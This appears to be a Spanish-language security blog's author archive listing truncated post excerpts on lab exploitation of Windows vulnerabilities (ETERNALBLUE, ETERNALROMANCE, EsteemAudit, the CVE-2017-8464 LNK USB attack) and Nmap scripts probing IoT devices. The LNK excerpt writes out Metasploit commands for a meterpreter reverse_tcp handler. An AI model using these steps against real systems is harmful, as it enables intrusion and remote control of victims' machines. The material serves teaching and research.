Archivo del Autor: hkm

Explotación de vulnerabilidades recientes de Windows

Explotación de vulnerabilidades recientes de Windows – Agosto 2017 from Websec México, S.C.

Share
Publicado en Presentaciones | Deja un comentario

Explotando ETERNALROMANCE ETERNALSINERGY en Windows Server 2016

El exploit se encuentra en la popular base de datos de exploits: exploit-db. Es necesario agregar una cuenta valida de cualquier nivel de permisos y el nombre de un PIPE. 1. Abrir firefox en la siguiente liga: https://gist.github.com/hkm/ 2. Click … Sigue leyendo

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Creando un USB malicioso con Microsoft Windows LNK Exploit: CVE-2017-8464

1. En Metasploit crea un HANDLER para recibir la conexión: msf 》 use exploit/multi/handler msf exploit(handler) 》 set payload windows/x64/meterpreter/reverse_tcp msf exploit(handler) 》 set LHOST TUDIRECCIÓNIP msf exploit(handler) 》 run 2. Ahora utiliza el exploit cve_2017_8464_lnk_rce para crear los archivos: … Sigue leyendo

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Detectando y Explotando ETERNALBLUE en Windows 7 x64 con NMAP y Metasploit

Esta práctica consiste en utilizar el exploit ya incluido en Metasploit para comprometer un Windows 7 de 64 bits. 1. Identifica en que rango está la máquina virtual desde Kali: root@kali:~# ifconfig eth0 (el rango debe verse similar a 192.168.179.XXX) … Sigue leyendo

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Explotando EsteemAudit en Windows 2003 x86 con EsteemAudit-2.1.0.exe desde Metasploit

La práctica consiste en explotar un Windows 2003 x86 con los exploits filtrados de la NSA desde Metasploit. La práctica incluye la instalación del ejecutable original de EsteemAudit-2.1.0.exe. 1. Identifica en que rango esta la máquina virtual desde Kali: root@kali:~# … Sigue leyendo

Share
Publicado en Videos, Vulnerabilidades | Deja un comentario

Scripts para obtener información de Trane Trace SC HVAC

Par de scripts para obtener información y explotar vulnerabilidades en Trane Tracer SC, un panel inteligente utilizado para comunicación con controladores de equipo HVAC. http-vuln-cve2016-0870.nse Download: https://github.com/hkm/nmap-nse-scripts/blob/master/http-vuln-cve2016-0870.nse Existe información sensible expuesta en la versión 4.20.1134 y anteriores en URLs como /evox/user/user/ … Sigue leyendo

Share
Publicado en Exploits, Scripts Nmap, Software, Vulnerabilidades | Deja un comentario

Congreso Internacional de Seguridad Informática UANL 2017

Participaré en el Congreso Internacional de Seguridad Informática organizado por la Facultad de Ciencias Físico Matemáticas y la Asociación Mexicana de Seguridad Informática. El congreso será inaugurado el día miércoles 30 de Agosto de 2017 a las 8:30 horas en … Sigue leyendo

Share
Publicado en Congresos | Deja un comentario

Script para obtener información de Phillips Hue Bridge

philipshue-info.nse Download: https://github.com/hkm/nmap-nse-scripts/blob/master/philipshue-info.nse El Philips Hue Bridge es un controlador de luces inteligentes. El script trane-info.nse muestra la información de modelo, versiones y dirección MAC obtenida del URL /api/config. No requiere autenticación. El URL no es mencionado en la documentación actual. … Sigue leyendo

Share
Publicado en Investigaciones, Scripts Nmap, Software | Deja un comentario

Scripts de NMap para Belkin Wemo Smart Switch

El Belkin WeMo Switch es un contacto eléctrico que puede ser controlado desde la red local. La versión actual del firmware (WeMo_WW_2.00.10966.PVT-OWRT-SNS) no requiere autenticación para prender o apagar el contacto eléctrico o para obtener información de las redes inalámbricas cercanas.   … Sigue leyendo

Share
Publicado en Exploits, Investigaciones, Scripts Nmap, Software, Videos, Vulnerabilidades | Deja un comentario

OWASP Latam Tour 2017 Riviera Maya

El OWASP LATAM Tour 2017 es un evento de seguridad que reune a expertos en materia de seguridad web y de aplicaciones. El evento se llevará a cabo el día 22 de abril en Tech Garage Cancún y no tendrá … Sigue leyendo

Share
Publicado en Congresos, OWASP Riviera | Deja un comentario